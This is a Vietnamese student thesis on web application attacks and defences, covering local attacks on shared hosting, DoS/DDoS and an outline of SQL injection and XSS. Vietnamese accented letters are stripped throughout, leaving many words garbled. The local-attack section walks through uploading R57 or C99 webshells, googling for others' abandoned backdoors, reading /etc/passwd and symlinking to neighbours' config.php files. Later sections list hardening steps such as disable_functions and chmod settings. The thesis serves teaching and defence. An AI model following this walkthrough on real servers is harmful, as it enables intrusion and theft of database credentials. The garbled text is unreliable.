MC LC

MC LC..............................................................................................................1
CHNG 1...........................................................................................................3
TNG QUAN V WEBSITE, CC DCH V CA WEBSITE V LI BO
MT THNG DNG...........................................................................................3
1.1. M t Website v cch hot ng...............................................................3
1.2. Cc dch v v ng dng trn nn web.......................................................4
CHNG 2...........................................................................................................5
CC LOI TN CNG V BO MT NG DNG WEB PH BIN..........5
2.1. LOCAL ATTACK......................................................................................5
2.1.1. Tm hiu v Local Attack.....................................................................5
2.1.2. Cch tn cng Local Attack.................................................................5
2.1.3. Cch bo mt cho Local Attack...........................................................9
2.1.4. Cc cng c h tr.............................................................................15
2.2. Tn cng t chi dch v - (Denial Of Service)........................................17
2.2.1. DOS(Denial Of Service)....................................................................17
2.2.2. Ddos(Distributed Denial of Service)..................................................21
2.2.3. Tn cng t chi dch v phn x nhiu vng DRDoS (Distributed
Reflection Denial of Service).......................................................................35
2.3. SQL Injection............................................................................................36
2.3.1. Tn cng SQL injection.....................................................................36
2.3.2.Cch Phng Trnh SQL Injection.......................................................43
2.4. Cross Site Scripting (XSS)........................................................................45
2.4.1. Tn cng XSS....................................................................................45
2.4.2. Phng Chng......................................................................................48
2.5. Botnet.......................................................................................................49
2.5.1. Tm hiu botnet v cch pht tn.......................................................49
2.5.2. Khc phc...........................................................................................49
2.5.5. Cc cng c h tr.............................................................................49
2.6. Social Engineering....................................................................................52
2.6.1. Cc kiu la o thng dng..............................................................52
Face mail...................................................................................................52
2.6.2. Cc kiu la o khc........................................................................54
2.7. Sniffer........................................................................................................54
2.7.1. Tm hiu tn cng kiu sniffer...........................................................54
2.7.2. Cc cng c h tr.............................................................................55
CHNG 3.........................................................................................................56
DEMO..................................................................................................................56
KT LUN..........................................................................................................65
TI LIU THAM KHO....................................................................................66
-1-

NHN XT CA GING VIN HNG DN..............................................68

NHN XT CA GING VIN PHN BIN.................................................69
LI M U
Cng vi s pht trin ca cng ngh thng tin, cng ngh mng my tnh v s pht
trin ca mng internet ngy cng pht trin a dng v phong ph. Cc dch v trn
mng thm nhp vo hu ht cc lnh vc trong i sng x hi. Cc thng tin trn
Internet cng a dng v ni dung v hnh thc, trong c rt nhiu thng tin cn
c bo mt cao hn bi tnh kinh t, tnh chnh xc v tnh tin cy ca n.
Bn cnh , cc hnh thc ph hoi mng cng tr nn tinh vi v phc tp hn. Do
i vi mi h thng, nhim v bo mt c t ra cho ngi qun tr mng l ht sc
quan trng v cn thit. Xut pht t nhng thc t , chng ta s tm hiu v cc cch
tn cng ph bin nht hin nay v cc phng chng cc loi tn cng ny.
Chnh v vy, thng qua vic nghin cu mt s phng php tn cng v cch bo
mt cc la tn cng ny,ti mong mun gp mt phn nh vo vic nghin cu v tm
hiu v cc vn an ninh mng gip cho vic hc tp v nghin cu.
Ti xin chn thnh cm n s hng dn ca Thy Nguyn Gia Nh l thy trc tip
hng dn n chuyn ngnh cho ti, gip ti c th hon thnh n ny.
1. L do chn ti
Trong nhng nm gn y, Vit Nam ngy cng pht trin v nht l v mt cng
ngh thng tin. c bit l v ng dng web, hu nh mi ngi ai cng tng nghe v
lm vic trn ng dng web. Website tr nn ph bin v tr thnh mt phn quan
trng ca mi ngi v nht l cc doanh nghip, cng ty. Bn cnh l do an ton
bo mt cho ng dng web lun l vn nan gii ca mi ngi.V vy chng ta s i
tm hiu ng dng web v cch thc tn cng v bo mt web.
2. Mc tiu
Gip chng ta c th hiu hn v cc ng dng website, cc mi e da v vn an
ton thng tin khi chng ta lm vic trn ng dng web hng ngy, hiu r hn v cc
k thut tn cng v bo mt web.
3. Phm vi

-2-

Tm hiu cc k thut tn cng ph bin nht hin nay nh SQL Injection, Denial Of
Service, Local Attack,Cch bo mt, phng th cc loi tn cng ph bin trn mt
cch tng quan nht.

CHNG 1
TNG QUAN V WEBSITE, CC DCH V CA WEBSITE V LI
BO MT THNG DNG
1.1. M t Website v cch hot ng
Website l mt trang web trn mng Internet, y l ni gii thiu nhng thng tin,
hnh nh v doanh nghip v sn phm, dch v ca doanh nghip (hay gii thiu bt
c thng tin g) khch hng c th truy cp bt k ni u, bt c lc no.
Website l tp hp nhiu trang [web page]. Khi doanh nghip xy dng website ngha
l ang xy dng nhiu trang thng tin, catalog sn phm, dch v.... to nn mt
website cn phi c 3 yu t c bn:
Cn phi c tn min (domain).
Ni lu tr website (hosting).
Ni dung cc trang thng tin [web page].
Mt s thut ng c bn:
- Website ng (Dynamic website) l website c c s d liu, c cung cp cng c
qun l website (Admin Tool). c im ca website ng l tnh linh hot v c th
cp nht thng tin thng xuyn, qun l cc thnh phn trn website d dng. Loi
website ny thng c vit bng cc ngn ng lp trnh nh PHP, Asp.net, JSP,
Perl,..., qun tr C s d liu bng SQL hoc MySQL,...
- Website tnh do lp trnh bng ngn ng HTML theo tng trang nh brochure, khng
c c s d liu v khng c cng c qun l thng tin trn website. Thng thng
website tnh c thit k bng cc phn mm nh FrontPage, Dreamwaver,... c
im ca website tnh l t thay i ni dung, s thay i ni dung ny thng lin
quan n s thay i cc vn bn i km th hin ni dung trn .

-3-

Hin nay, hu ht cc doanh nghip u s dng website ng, th h cng ngh

website c mi ngi bit n l web 2.0.
Tn min (domain): Tn min chnh l a ch website, trn internet ch tn ti duy
nht mt a ch (tc l tn ti duy nht mt tn min). C 2 loi tn min:
Tn min Quc t: l tn min c dng .com; .net; .org; .biz; .name ... V d:
www.tendep.com, www.kenhtretho.com
Tn min Vit Nam: l tn min c dng .vn; .com.vn; .net.vn; org.vn; .gov.vn;... v
d: www.tamnguyen.vn, www.tamnguyen.com.vn, www.dantri.com.vn
Lu tr website: D liu thng tin ca website phi c lu tr trn mt my tnh
(my ch - server) lun hot ng v kt ni vi mng Internet. Mt server c th lu
tr nhiu website, nu server ny b s c chng hn tt trong mt thi im no th
khng ai c th truy cp c nhng website lu tr trn server ti thi im b s c.
Ty theo nhu cu lu tr thng tin m doanh nghip c th thu dung lng thch
hp cho website [thu dung lng host].
Dung lng host: L ni lu c s tr d liu ca website (hnh nh, thng tin
), n v o dung lng thng l Mb hoc Gb.
Bng thng hay dung lng ng truyn truyn: L tng s Mb d liu ti ln my
ch hoc ti v t my ch (download, upload) ni t website, n v o thng
thng l Mb/Thng.
1.2. Cc dch v v ng dng trn nn web
Vi cng ngh hin nay, website khng ch n gin l mt trang tin cung cp cc
tin bi n gin. Nhng ng dng vit trn nn web khng ch c gi l mt phn
ca website na, gi y chng c gi l phn mm vit trn nn web.
C rt nhiu phn mm chy trn nn web nh Google word (x l vn bn), Google
spreadsheets (x l bng tnh), Email ,
Mt s u im ca phn mm hay ng dng chy trn nn web:

Mi ngi u c trnh duyt v bn ch cn trnh duyt chy phn mm.

Phn mm lun lun c cp nht v chng chy trn server
Lun sn sng 24/7
D dng backup d liu thng xuyn
-4-

C th truy cp mi lc, mi ni, min l bn c mng

Chi ph trin khai cc r so vi phn mm chy trn desktop

Hy hnh dung bn c mt phn mm qun l bn hng hay qun l cng vic cng
ty. Khng phi lc no bn cng cng ty, vi phn mm vit trn nn web, bn c
th vo kim tra, iu hnh bt c u, thm ch bn ch cn mt chic in thoi
chy c trnh duyt nh IPhone m khng cn n mt chic my tnh.

CHNG 2
CC LOI TN CNG V BO MT NG DNG WEB PH BIN
2.1. LOCAL ATTACK
2.1.1. Tm hiu v Local Attack
Local attack l mt trong nhng kiu hack rt ph bin v khng c khuyn
dng.i mt web server thng thng khi bn ng k mt ti khon trn server no
bn s c cp mt ti khon trn server v mt th mc qun l site ca
mnh. V d : tenserver/tentaikhoancuaban. V nh vy cng c mt ti khon ca
ngi dng khc tng t nh : tenserver/taikhoan1.Gi s taikhoan1 b hacker chim
c th hacker c th dng cc th thut,cc on scrip,cc on m lnh truy cp
sang th mc cha site ca bn l tenserver/taikhoancuaban. V cng theo cch ny
hacker c th tn cng sang cc site ca ngi dng khc v c th ly thng tin
admin,database,cc thng tin bo mt khc hoc chn cc on m c vo trang index
ca site bn. Dng tn cng trn gi l Local Attack
Thng thng nht, Local Attack c s dng c ly thng tin config t victim,
sau da vo thng tin config v mc ch ca hacker ph hoi website
2.1.2. Cch tn cng Local Attack
thc hin tn cng Local Attack, ty theo cch thc ca hacker m c nhng cch
Local khc nhau. Thng thng th cc hacker thng s dng cc on lnh tn
cng vo database

-5-

2.1.2.1. Chun b
- Trc tin phi c mt con PHP/ASP/CGI backdoor trn server. Backdoor th c rt
nhiu loi khc nhau nhng ph bin nht l phpRemoteView (thng c gi l
remview) R57Shell, CGITelnet,C99,
Tin hnh upload cc cng c trn ln, thng l cc con shell nh R57,C99,
- Upload mt trong nhng cng c ln host (Thng th chng ta s dng cc con
shell R57,C99,.. v n mnh v d s dng)
c host chng ta c nhiu cch:
+Mua mt ci host(cch ny hacker t s dng v nhiu l do nhng l do c bn vn
l tn tin m khi up shell ln nu b admin ca server pht hin s b del host,..Vi
cch ny th sau khi Local xong th nn xa cc con shell ngay lp tc.
+ Hack mt trang b li v upload shell ln (thng th hacker s dng SQL Injection
hack mt trang web v chim ti khon admin ca trang web v upload cc con
shell ln)hoc khai thc li inclusion
+ Search backdoor (Vo google.com search keyword: <?phpRemoteView?> ,
r57Shell ...). Vi cch ny th hu ht cc con shell l ca cc hacker s dng v
cha b xa, nu c th chng ta nn upload cho chng ta mt con shell khc
2.1.2.2.Tin hnh Attack
Sau khi chng ta chun b xong, tc l upload c con shell ln 1 server no .
Chng ta bt u tm cc website cng server m bn up shell ln, thng thng cc
hacker thng s dng Reverse Ip domain m hacker upload shell xem cc
website cng server
Sau khi tm c danh sch website ,ln lt check xem site no b li v c th local
sang c
Cc lnh thng dng trong shell Local Attack
Xem tn domain trn cng 1 host
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia
Trng hp c bit khi khng th xem user nm cng host th ta thm && vo
-6-

cd /etc/vdomainaliases && ls -lia

+ Mun bit tn user th dng lnh :
cat /etc/passwd/
Hoc
less /etc/passwd
+ local sang victim, tc l local sang site khc
v d hin ti con shell chng ta ang :
/home/abcd/public_html/
th chng ta s local sang nh sau :
dir home/tn user cn local/public_html
Mun bit tn user cn local sang th chng ta s dng Reverse Ip ly danh sch
user trn cng mt server.Mun bit user c tn ti hay khng chng ta m trnh
duyt web ln v nh on : Ip ca server/~ tn user(V d :
203.166.222.121/~doanchuyennganh).Nu trnh duyt hin ln trang index ca website
th tc l user tn ti
+Xem ni dung ca file
cat /home/tn user cn local/public_html/index.php
Hoc
Chng ta mun xem config ca 1 forum th dng
ln -s /home/tn user cn local/public_html/forum/includes/config.php
doanchuyennganh.txt Vi doanchuyennganh.txt y l file chng ta to ra trn host
ca chng ta xem file ca ngi khc ! Nu khng s dng c cc lnh trn tc l
server disable chc nng .
Thm 1 s lnh shell trong linux :
- pwd: a ra ngoi mn hnh th mc ang hot ng (v d: /etc/ssh).
- cd: thay i th mc (v d: cd .. ra mt cp th mc hin ti; cd vidu vo th
mc /vidu).
- ls: a ra danh sch ni dung th mc.
- mkdir: to th mc mi (mkdir tn_thumuc).
- touch: to file mi (touch ten_file).
-7-

- rmdir: b mt th mc (rmdir ten_thumuc).

- cp: copy file hoc th mc (cp file_ngun file_ch).
- mv: di chuyn file hoc th mc; cng c dng t li tn file hoc th mc (mv
v_tr_c v_tr_mi hoc mv tn_c tn_mi).
- rm: loi b file (rm tn_file).
tm kim file, bn c th dng: - find : dng cho cc tn file. - grep <>: tm ni
dung trong file.
xem mt file, bn c th dng:
- more : hin th file theo tng trang.
- cat <>: hin th tt c file.
Nu mun kt ni ti mt host t xa, s dng lnh ssh. C php l ssh <tn_host>.
Qun l h thng:
- ps: hin th cc chng trnh hin thi ang chy (rt hu ch: ps l ci nhn ton b
v tt c cc chng trnh).
Trong danh sch a ra khi thc hin lnh ps, bn s thy c s PID (Process
identification - nhn dng tin trnh).
Con s ny s c hi n khi mun ngng mt dch v hay ng dng, dng lnh kill
- top: hot ng kh ging nh Task Manager trong Windows. N a ra thng tin v
tt c ti nguyn h thng, cc tin trnh ang chy, tc load trung bnh Lnh top
-d <delay> thit lp khong thi gian lm ti li h thng. Bn c th t bt k gi tr
no, t .1 (tc 10 mili giy) ti 100 (tc 100 giy) hoc thm ch ln hn.
- uptime: th hin thi gian ca h thng v tc load trung bnh trong khong thi
gian , trc y l 5 pht v 15 pht.
Thng thng tc load trung bnh c tnh ton theo phn trm ti nguyn h
thng (vi x l, RAM, cng vo/ra, tc load mng) c dng ti mt thi im.
Nu tc c tnh ton l 0.37, tc c 37% ti nguyn c s dng. Gi tr ln hn
nh 2.35 ngha l h thng phi i mt s d liu, khi n s tnh ton nhanh hn
235% m khng gp phi vn g. Nhng gia cc phn phi c th khc nhau mt
cht.
- free: hin th thng tin trn b nh h thng.
-8-

- ifconfig <tn_giao_din>: xem thng tin chi tit v cc giao din mng; thng
thng giao din mng ethernet c tn l eth(). Bn c th ci t cc thit lp mng
nh a ch IP hoc bng cch dng lnh ny (xem man ifconfig). Nu c iu g
cha chnh xc, bn c th stop hoc start (tc ngng hoc khi_ng) giao din bng
cch dng lnh ifconfig <tn_giao_din> up/down.
- passwd: cho php bn thay i mt khu (passwd ngi_dng_s_hu_mt_khu
hoc tn ngi dng khc nu bn ng nhp h thng vi vai tr root).
- useradd: cho php bn thm ngi dng mi (xem man useradd).
D phn phi no, bn cng c th dng phm TAB t ng hon chnh mt lnh
hoc tn file. iu ny rt hu ch khi bn quen vi cc lnh. Bn cng c th s dng
cc phm ln, xung cun xem cc lnh nhp. Bn c th dng lnh a dng trn
mt dng. V d nh, nu mun to ba th mc ch trn mt dng, c php c th l:
mkdir th_mc_1 ; mkdir th_mc_2 ; mkdir th_mc_3.
Mt iu th v khc na l cc lnh dng pipe. Bn c th xut mt lnh thng qua
lnh khc. V d: man mkdir | tail s a ra thng tin cc dng cui cng trong trang
xem "th cng" ca lnh mkdir.
Nu lc no c yu cu phi ng nhp vi ti khon gc (tc "siu" admin ca
h thng), bn c th ng nhp tm thi bng cch dng lnh su. Tham s -1 (su-1)
dng thay i th mc ch v cho cc lnh hoc ang dng. Ch l bn cng s
c nhc mt mt khu.
thot hay ng : g exit hoc logout.
2.1.3. Cch bo mt cho Local Attack
hn ch Local Attack, chng ta nn Chmod filemanager ,di chuyn file
config.php v sa i file htaccess v nht l thng xuyn backup d liu
-Chmod File Manager:
+ CHMOD th mc Public_html thnh 710 thay v 750 mc nh vic ny s gip bn
bo v c cu trc Website ca mnh.
+ CHMOD tip cc th mc con (diendan (http://diendan.doanchuyennganh.com),
CHMOD th mc diendan (http://diendan.doanchuyennganh.com) thnh 701, ri
-9-

CHMOD tip cc th mc con trong th mc diendan

(http://diendan.doanchuyennganh.com) thnh 701
+ CHMOD ton b file thnh 404
Vi CHMOD chc chn khi run shell s hin ra thng bo li:
Not Acceptable
An appropriate representation of the requested resource /test.php could not be found on
this server.
Additionally, a 404 Not Found error was encountered while trying to use an
ErrorDocument to handle the request.
Attacker s khng view c.
Ngoi ra , mt s site th bn truy cp bng subdomain ca n m khng l dng
doanchuyenganh.com/diendan (http://diendan.doanchuyennganh.com), ci ny c
nhiu ngha, nhng trong bo mt th n s rt khc.
+ CHMOD th mc l 701 v c gng ng bao gi CHMOD 777, c mt s folder ko
quan trng, bn c th CHMOD 755 c th hin th ng v y mt s ni dung
trong Folder .
Ch th ny, mt s Server h tr CHMOD th mc c 101, nu Server ca bn
h tr ci ny th hy s dng n, v bin php CHMOD ny rt an ton, n ngay c
Owner cng ko th xem c cu trc Folder ngay c khi vo FTP. Hin ch c Server
ca Eshockhost.net l h tr ci ny.
+ CHMOD File l 604 v ng bao gi l 666 nu c vic cn 666 th chng ta
CHMOD tm s dng lc , sau hy CHMOD li ngay. i vi cc Server h
tr CHMOD file 404 chng ta hy CHMOD nh vy, v d Server Eshockhost.net
- Thay i cu trc, tn file mc nh c cha cc thng tin quan trng . Nu c th hy
thay i c cu trc CSDL nu bn lm c .
-Chng local bng cch bt safe-mode (dnh cho root):
Nh chng ta bit, i vi cc webshell - PHP, trong PHP Configuration c
nhng option hn ch tnh nng ca n (c bit l r57 - t ng by pass) nn cng
vic u tin ca cc root account l phi cp nht cc phin bn PHP mi nht v
config li php.ini :
-10-

[i]PHP safe mode l phng php gii quyt vn bo mt cho nhng ni server
chia s hosting cho nhiu accounts (shared-server). N l do thit k 1 cch sai lc ca
tng cp PHP. Hin nay, nhiu ngi chn phng php bt safe-mode bo mt,
c bit l cc ISP
Cc hng dn v cu hnh Security and Safe Mode :
Code:
safe_mode: mc nh : "0" sa di phn quyn : PHP_INI_SYSTEM
safe_mode_gid: mc nh :"0"sa di phn quyn : PHP_INI_SYSTEM
safe_mode_include_dir: mc nh :NULL sa di phn quyn : PHP_INI_SYSTEM
safe_mode_exec_dir: mc nh :""sa di PHP_INI_SYSTEM
safe_mode_allowed_env_vars: mc nh :"PHP_"sa di PHP_INI_SYSTEM
safe_mode_protected_env_vars: mc nh :"LD_LIBRARY_PATH"sa di
PHP_INI_SYSTEM
open_basedir: mc nh :NULL sa di PHP_INI_SYSTEM
disable_functions: mc nh :"" sa di php.ini
disable_classes : mc nh : ""sa di php.ini
Sau y l cch c chnh cu hnh server bt ch safe mode :
Trong file php.ini :
safe_mode = Off chuyn thnh safe_mode = On
disabled_functions nn cha nhng function sau :
PHP Code:
readfile,system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close,
proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit,
escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source,ini_alter,
virtual, openlog
Khi , ta v d :
PHP Code:
-rw-rw-r-- 1 doanchuyennganh doanchuyennganh 33 Jul 1 19:20 script.php
-rw-r--r-- 1 root root 1116 May 26 18:01 /etc/passwd
Trong script.php l :
-11-

PHP Code:
<?php
readfile('/etc/passwd');
?>
Kt qu :
PHP Code:
Warning: readfile() has been disabled for security reasons in
/docroot/script.php on line 2
Vi li im ca vic bt safe mode:
Thng khi upload file, file s vo /tmp/ vi nhng ngi c quyn khng phi l
owner.
Bt safe-mode s c nhng bt li vi ngi lp trnh code PHP, do , h thng c :
PHP Code:
PHP Code:
<?php
// Kim tra safe mode
if( ini_get('safe_mode') ){
// Code theo bt safe_mode
}else{
// Code theo tt safe_mode
}
?>
-Bo mt server apache :
By gi, xin gii thch tm quan trng ca apache :
Client (Hacker using local attack) ------> Shared server
Shared Server --------------------------> Apache
Apache ---------------------------------> PHP/Perl ... x l ...
PHP/Perl (gi kt qu) -----------------> Apache
Apache (gi kt qu) ------------------>Client
Do quyn chnh apache set .. ch 0 h ph thuc nhiu vo cc application nh
-12-

PHP/CGI ...
Ci t apache :
Code:
pw groupadd apache
pw useradd apache -c "Apache Server" -d /dev/null -g apache -s /sbin/nologin
Theo mc nh, cc process thuc Apache chy vi ch quyn ca ngi dng nobody
(ngoi tr process chnh phi chy vi ch quyn root) v GID thuc nhm nogroup.
iu ny c th dn n nhng e da bo mt nghim trng. Trong trng hp t
nhp thnh cng, tin tc c th ly c quyn truy dng n nhng process khc chy
cng UID/GID. Bi th, gii php ti u l cho Apache chy bng UID/GID t nhm
ring bit, chuyn ch n software y thi.
i vi nhng ai quen dng *nix hn khng l g vi khi nim UID/GID thuc ch
"file permission". Tuy nhin, chi tit ny nn m rng mt t cho nhng bn c cha
quen thuc vi UID/GID. Phn to nhm (group) v ngi dng (user) ring cho
Apache trn c hai chi tit cn ch l:
-d /dev/null: khng cho php user Apache c th mc $HOME nhng nhng user bnh
thng khc
-s /sbin/nologin: khng cho user Apache dng bt c mt shell no c. C mt s
trng hp dng -s /bin/true thay v nologin trn, true l mt lnh khng thc thi g
c v hon ton v hi.
L do khng cho php user Apache c th mc $HOME v khng c cp mt
"shell" no c v nu account Apache ny b c cho php, tin tc cng khng c c
hi tip cn vi system mc cn thit cho th thut "leo thang c quyn". Trn
mi trng *nix ni chung, "shell" l giao din gia ngi dng v h thng, khng c
shell th khng c c hi tip cn. Nu phn thit lp trn cung cp user Apache mt
$HOME v cho php dng mt shell no th khng mang gi tr g trn quan
im "bo mt".
Vo http://httpd.apache.org/ ci t phin bn mi nht (hin gi 2.2)
Khi ta nn set quyn ca php shell ring, n khng c quyn c nhy sang cc
user khc .
-13-

Chmod trong /usr/bin nh sau :

-rwxr--r-x root nobody wget
cho -rwxr-x--- root compiler gcc
Chn bin dch gcc, trnh user dng nhng exploit sn bin dch get root.
Trong /bin/:
-rwxr-xr-x root root cp
Tng t vi rm, mv, tar, chmod, chown, chgrp...
-rwsr-x--- root wheel su
-rwxr-x--- root root ln
-Cc cch chng Local Attack khc
+Thng xuyn backup d liu (gim thit hi khi b drop database)
+B quyn DROP database ca user
+t safemode on v disable 1 s hm nguy him = cch to file php.ini vi ni dung
sau
M:
safe-mode = on
display_errors = Off
disable_functions = passthru, system, shell_exec, exec, dir, readfile,
virtual,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,soc
ket_create_listen
proc_terminate
log_errors = On
Ri up ln th mc public_html,sau cmod thnh 444
+i tn,t pass cho th mc admincp:
i tn admincp v nhng ng sa li trong file config.php tn mi nh,v d l !!!!
aaaad@.Thay vo ,bn lm nh sau:to 1 th mc khc,ly tn l "admincp" ,sau
copy ton b file trong th mc "!!!!aaaad@" qua th mc ny,sau ,m tng file 1
ra,sa lung tung ln(file khng chy c),nhng ng sa file index.php l c.
Sau vo cpanel,t pass cho th mc "!!!!aaaad@" v th mc "admincp"
Gii thch qua v tc dng ca vic ny:Bn tng tng,nu nh hacker bit c
-14-

pass admin,mun vo admincp th chc chn s vo

http://doanchuyennganh.com/forum/admincp ,sau s phi tm cch vt qua pass
protect,nu c vt qua c,ng nhp vo th cng khng lm c g(bi v tt c
cc file trong th mc "admincp" ta sa lung tung)
+Di chuyn v tr file config.php:
Vic ny l 1 vic rt quan trng,v gi s hacker c up shell ln c th cng phi c
user v pass th mi connect c n database.Bn lm nh sau:
B1: zend file config.php li,i tn thnh 1 file khc,chng hn a.php,ri chuyn
vo 1 th mc no ngoi th mc public_html l c.V d:
B2: to 1 file khc tn l config.php vi ni dung sau: V d:
M:
Bn nh thay /home/lyamsinf/php/config.php = ng dn n file a.php ca
bn.Sau tip tc zend file ny li.
B3: Tip tc di chuyn file "config.php"(file trong th mc includes y nh)n 1
v tr khc(d nhin l ngoi th mc public_html)
M file "class_core.php" trong th mc "includes",sa li ng dn n file
"config.php".Lm tng t vi file "diagnostic.php" trong th mc "!!!!
aaaad@"(th mc admincp m bn i tn ).Ri zend 2 file "diagnostic.php" v
"class_core.php".
Sau nh vo th mc includes,to 1 file config.php "gi",in by b thng tin
user,pass ng nhp database li v cng zend li nt!
Th l ta giu file config.php tht 1 cch kh k ,hacker s kh nn khi mun m
c file config.php tht!Nh vy l tm thi yn tm v thng tin ng nhp
database ko b mt na!
2.1.4. Cc cng c h tr
-Cng c h tr Local Attack ph bin v hay dng nht l cc con shell.Cc loi shell
thng s dng l R57,C99,..

-15-

Hnh 2.1. Hnh nh ca 1 dng shell

-16-

2.2. Tn cng t chi dch v - (Denial Of Service)

2.2.1. DOS(Denial Of Service)

-17-

2.2.1.1. Gii thiu khi qut v DoS:

DoS (Denial of Service) c th m t nh hnh ng ngn cn nhng ngi
dng hp php ca mt dch v no truy cp v s dng dch v . N bao
gm c vic lm trn ngp mng, lm mt kt ni vi dch v m mc ch
cui cng l lm cho server khng th p ng c cc yu cu s dng dch
v t cc client. DoS c th lm ngng hot ng ca mt my tnh, mt mng
ni b, thm ch c mt h thng mng rt ln. Thc cht ca DoS l k tn
cng s chim dng mt lng ln ti nguyn mng nh bng thng, b nh
v lm mt kh nng x l cc yu cu dch v n t cc client khc.
2.2.1.2. Cc cch thc tn cng:
+ Ph hoi da trn tnh gii hn hoc khng th phc hi ca ti nguyn
mng.
- Thng qua kt ni:
Tn cng kiu SYN flood:
FPRIVATE "TYPE=PICT;ALT="
Li dng cc thc hot ng ca kt ni TCP/IP, hacker bt u qu trnh thit
lp mt kt ni TPC/IP vi mc tiu mun tn cng nhng s ph v kt ni
ngay sau khi qu trnh SYN v SYN ACK hon tt, khin cho mc tiu ri vo
trng thi ch (i gi tin ACK t pha yu cu thit lp kt ni) v lin tc
gi gi tin SYN ACK thit lp kt ni . Mt cch khc l gi mo a ch IP
ngun ca gi tin yu cu thit lp kt ni SYN v cng nh trng hp trn,
my tnh ch cng ri vo trng thi ch v cc gi tin SYN ACK khng th
i n ch do a ch IP ngun l khng c tht. Cch thc ny c th c
cc hacker p dng tn cng mt h thng mng c bng thng ln hn h
thng ca hacker.
- Li dng ngun ti nguyn ca chnh nn nhn tn cng:
Tn cng kiu Land Attack: cng tng t nh SYN flood nhng hacker s
dng chnh IP ca mc tiu cn tn cng dng lm a ch IP ngun trong
gi tin, y mc tiu vo mt vng lp v tn khi c gng thit lp kt ni vi
chnh n.
-18-

Tn cng kiu UDP flood: hacker gi gi tin UDP echo vi a ch IP ngun

l cng loopback ca chnh mc tiu cn tn cng hoc ca mt my tnh trong
cng mng vi mc tiu qua cng UDP echo (port 7) thit lp vic gi v
nhn cc gi tin echo trn 2 my tnh (hoc gia mc tiu vi chnh n nu
mc tiu c cu hnh cng loopback) khin cho 2 my tnh ny dn dn s
dng ht bng thng ca chng v cn tr hot ng chia s ti nguyn mng
ca cc my tnh khc trong mng.
-S dng bng thng:
Tn cng kiu DDoS (Distributed Denial of Service): y l cch thc tn
cng rt nguy him. Hacker xm nhp vo cc h thng my tnh, ci t cc
chng trnh iu kin t xa v s kch hot ng thi cc chng trnh ny
vo cng mt thi im ng lot tn cng vo mt mc tiu. Cch thc
ny c th huy ng ti hng trm thm ch hng ngn my tnh cng tham gia
tn cng mt lc (ty vo s chun b trc ca hacher) v c th ngn ht
bng thng ca mc tiu trong nhy mt.
-S dng cc ngun ti nguyn khc:
K tn cng li dng cc ngun ti nguyn m nn nhn cn n tn cng.
Nhng k tn cng c th thay i d liu v t sao chp d liu m nn nhn
cn ln nhiu ln lm CPU b qu ti v cc qu trnh x l d liu b nh tr.
- Tn cng kiu Smurf Attack: kiu tn cng ny cn mt h thng rt quan
trng, l mng khuych i. Hacker dng a ch ca my tnh cn tn cng
gi broadcast gi tin ICMP echo cho ton b mng. Cc my tnh trong mng
s ng lot gi gi tin ICMP reply cho my tnh m hacker mun tn cng.
Kt qu l my tnh ny s khng th x l kp thi mt lng ln thng tin
nh vy v rt d b treo.
- Tn cng kiu Tear Drop: trong mng chuyn mch gi, d liu c chia
nh lm nhiu gi tin, mi gi tin c mt gi tr offset ring v c th truyn i
theo nhiu ng ti ch. Ti ch, nh vo gi tr offset ca tng gi tin
m d liu li c kt hp li nh ban u. Li dng iu ny, hacker c th
to ra nhiu gi tin c gi tr offset trng lp nhau gi n mc tiu mun tn
-19-

cng. Kt qu l my tnh ch khng th sp xp c nhng gi tin ny v

c th b treo do dng ht nng lc x l ca h thng.
+.Ph hoi hoc chnh sa thng tin cu hnh.
Li dng vic cu hnh thiu an ton (v d nh vic khng xc thc thng tin
trong vic gi v nhn bn tin update ca cc router) m k tn cng s thay
i t xa hoc trc tip cc thng tin quan trng khin cho nhng ngi dng
hp php khng th s dng dch v. V d: hacker c th xm nhp vo DNS
thay i thng tin, dn n qu trnh bin dch domain name sang IP ca
DNS b sai lch. Kt qu l cc yu cu ca client n mt domain no s
bin thnh mt domain khc.
+.Ph hoi hoc chnh sa vt l phn cng.
Li dng quyn hn ca chnh bn thn k tn cng i vi cc thit b trong
h thng mng tip cn ph hoi (cc router, switch)
2.2.1.3 Cc cch phng chng
DoS c th lm tiu tn rt nhiu thi gian cng nh tin bc, v vy, cn phi
c nhng bin php phng chng:
- M hnh h thng phi c xy dng hp l, trnh ph thuc ln nhau qu
mc d dn n mt b phn gp s c s lm c h thng b trc trc.
- Thit lp password bo v cc thit b hay cc ngun ti nguyn quan trng.
- Thit lp cc mc xc thc i vi ngi dng cng nh cc ngun tin trn
mng (cc thng tin cp nht nh tuyn gia cc router cng nn thit lp
ch xc thc)
- Xy dng h thng lc thng tin trn router, firewall v h thng bo v
chng li SYN flood.
- Ch chp nhn cc dch v cn thit, tm thi dng cc dch v cha c yu
cu cung cp hoc khng s dng.
- Xy dng h thng nh mc, gii hn cho ngi s dng ngn nga
trng hp ngi dng c c mun li dng cc ti nguyn trn server tn
cng chnh server hay mng, server khc.
- Lin tc cp nht, nghin cu, kim tra pht hin cc l hng bo mt v
-20-

c bin php khc phc kp thi.

- S dng cc bin php kim tra hot ng ca h thng mt cch lin tc
pht hin ngay nhng hnh ng bt bnh thng.
- Xy dng h thng d phng.
2.2.2. Ddos(Distributed Denial of Service)
Distributed Denial Of Service (DDoS) l k thut tn cng lm cc ISP lo u, gii
hacker chnh thng th khng cng nhn DdoS l k thut tn cng chnh thng. Th
nhng Black hat ang c rt nhiu u th khi trin khai tn cng bng k thut DdoS.
Vic phng nga v ngn chn DdoS vn cn ang thc hin mc khc phc hu
qu v truy tm th phm
2.2.2.1. Cc giai on ca mt cuc tn cng kiu DdoS:
Bao gm 3 giai on:
i. Giai on chun b:
- Chun b cng c quan trng ca cuc tn cng, cng c ny thng thng hot ng
theo m hnh client-server. Hacker c th vit phn mm ny hay down load mt cch
d dng, theo thng k tm thi c khong hn 10 cng c DDoS c cung cp min
ph trn mng (cc cng c ny s phn tch chi tit vo phn sau)
- K tip, dng cc k thut hack khc nm trn quyn mt s host trn mng. tin
hnh ci t cc software cn thit trn cc host ny, vic cu hnh v th nghim ton
b attack-netword (bao gm mng li cc my b li dng cng vi cc software
c thit lp trn , my ca hacker hoc mt s my khc c thit lp nh
im pht ng tn cng) cng s c thc hin trong giai on ny.
ii. Giai on xc nh mc tiu v thi im:
- Sau khi xc nh mc tiu ln cui, hacker s c hot ng iu chnh attack-netword
chuyn hng tn cng v pha mc tiu.
